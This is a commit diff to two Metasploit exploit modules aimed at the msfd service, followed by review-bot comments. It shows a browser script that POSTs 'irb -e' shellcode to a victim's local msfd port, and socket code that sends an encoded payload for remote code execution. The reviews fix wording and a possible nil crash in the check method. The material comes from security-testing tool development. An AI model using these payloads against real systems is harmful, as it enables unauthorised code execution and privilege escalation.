Minor changes in description and comments

GSoC/Meterpreter_Web_Console
Robin Stenvi 2018-04-22 21:27:25 +02:00
parent 940028f719
commit df7db27106
2 changed files with 12 additions and 13 deletions


@ -19,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
this module places the payload in the POST-data. These POST-requests
can be sent cross-domain and can therefore be sent to localhost on the
victim's machine. The msfconsole-command to execute code is 'rbi -e
"PAYLOAD"'.
},
"CODE"'.
},
'License' => BSD_LICENSE,
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'Platform' => 'ruby',
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DisableNops' => 'True',
'BadChars' => "\x22\x0a"
},
'DisclosureDate' => 'Apr 11 2018',
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options([
@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
<body>
<script>
var #{var1} = new XMLHttpRequest();
#{var1}.onreadystatechange = function() { if (#{var1}.readyState == 4) {console.log(#{var1}); } }
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
var #{var2} = String("#{shellcode}");
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
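Review bot: The description in the first hunk still names the command as `'rbi -e`, while the request body built in the last hunk sends `irb -e`. The commit rewords the end of that sentence but leaves the transposed name, so it should read `'irb -e "CODE"'`. In the second hunk, `'DisableNops' => 'True'` is a string, whereas the other module touched by this commit uses the boolean `true`. Any string is truthy in Ruby, so it probably behaves the same, but `'DisableNops' => true` states the intent and keeps the two modules consistent. The `initialize` body and the HTML template both start and end outside these hunks.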


@ -10,15 +10,15 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'MSFD remote socket',
'Name' => 'Metasploit msfd Remote Code Execution',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. If this socket is accessible on a remote
interface, an attacker can execute commands.
interface, an attacker can execute commands on the victim's machine.
If msfd is running with higher privileges than the current user, this
module can also be used for privilege escalation. In that case, port
forwarding on the compromised host can be used.
If msfd is running with higher privileges than the current local user,
this module can also be used for privilege escalation. In that case,
port forwarding on the compromised host can be used.
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
},
@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'BadChars' => "\x27\x0a", # Quote nece
'BadChars' => "\x27\x0a",
'DisableNops' => true
},
'Targets' =>
@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Automatic', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 11 2018',
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options(
@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
def check
connect
data = sock.get
data = sock.get_once
if data.include?("msf")
disconnect
return Exploit::CheckCode::Appears
@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
connect
data = sock.get
data = sock.get_once
sock.put "irb -e '" + payload.encoded + "'\n"
disconnect
end
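Review bot: In `check`, `sock.get_once` can return nil when the peer sends nothing before the read times out, and the next line calls `data.include?("msf")` on it. That would raise NoMethodError instead of returning a check code; `if data && data.include?("msf")` (or `data.to_s.include?("msf")`) lets the method fall through to its negative result. The rest of `check` lies outside the hunk, so its other branch is not visible here. The bare substring `"msf"` is also a loose fingerprint, so a short comment such as `# msfd greets with the msfconsole prompt` would document what banner is expected. In `exploit`, `data` is assigned but never read; if the read is only there to consume the banner, drop the assignment and say so in a comment.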